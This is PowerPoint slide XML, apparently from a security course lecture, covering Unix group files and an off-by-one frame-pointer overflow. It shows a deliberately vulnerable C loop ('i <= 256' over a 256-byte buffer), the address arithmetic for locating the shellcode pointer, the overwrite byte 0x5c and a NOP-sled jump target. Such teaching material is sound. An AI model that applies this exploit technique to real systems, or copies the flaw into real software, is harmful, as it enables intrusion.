              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + 4 // the size of ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218149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61FC91A1-9B12-EF3D-DD48-CD6E7AD09931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="69056" tIns="34529" rIns="69056" bIns="34529" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Groups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594947" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DC07C9-CE2F-28AE-86A6-2ABEE20BB325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="69056" tIns="34529" rIns="69056" bIns="34529" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Users can belong to one or more groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Each user belongs to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>primary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> group as stored in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/passwd file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Users can be become part of a group using explicit commands/APIs (in some cases by providing a group password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/group file specifies the group names/IDs and group membership for non-primary groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Sensitive information (e.g., hashed group passwords) is stored in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>gshadow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>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Determining &amp;&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>From the buffer address, we have to determine where the four bytes containing the shellcode address are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Add 256 bytes to account for the buffer length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Subtract 4 bytes for size of pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;&amp;shellcode = 0xbffffc64 + 0x100 - 0x04 = 0xbffffd60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130543291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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Computing the Overflowing Byte </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and &amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With high likelihood, the most significant 3 bytes of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to be (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4), since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is incremented when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is popped from stack (pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desired byte is (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4) &amp; 0x000000ff = 0x5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have to choose a value to jump to in the NOP range </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Say 0xbffffc74 (16 bytes within the buffer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221768962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r>
              <a:rPr lang="en-US"/>
              <a:t>Overflowed Buffer Contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134595" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="1657350"/>
            <a:ext cx="4648200" cy="26860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endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134596" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="38862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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134597" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="34290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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134598" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="36576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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134599" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="32004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shellcode starts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134600" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="29718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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134601" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="27432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shellcode ends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134602" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4114800"/>
            <a:ext cx="4648200" cy="2286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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134603" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="21336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ebp[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>bf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134604" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="33528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ebp[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134605" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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ebp[2]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134606" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="2171700"/>
            <a:ext cx="1143000" cy="342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0x5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134607" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="25146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0xbffffc74</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134609" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="36576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0xbffffc74</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134610" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="25146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0xbffffd60</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134611" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="27432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0xbffffd5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38060172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3664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664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3664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3664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3664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3665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5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5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3665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3665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3665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3665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3665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3665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3666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6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6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3666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3666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36667" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136659" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2260226" y="3414921"/>
            <a:ext cx="4216774" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136668" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136658" idx="1"/>
            <a:endCxn id="1136662"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36669" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136657" idx="1"/>
            <a:endCxn id="1136649" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3286125"/>
            <a:ext cx="1588" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136670"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36671"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6672"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5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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28046368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3869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869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3869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3869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3869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3869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3870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3870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3870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3870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3870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3870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3870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1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3871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3871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38715" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138707"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1138716" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138706" idx="1"/>
            <a:endCxn id="1138710"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38717" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138705" idx="1"/>
            <a:endCxn id="1138710" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1685925"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138718"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38719"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8720"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func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  char buffer[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> &lt;= 256; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>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6827048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40741"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0742"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40743"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40744"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40745"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40747"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48"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49"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40750"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40751"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40752"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40753"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40754"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40755"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40756"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57"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58"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40759"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40760"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40763" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140755" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4043571"/>
            <a:ext cx="3886200" cy="842754"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140764" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140754" idx="1"/>
            <a:endCxn id="1140743" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
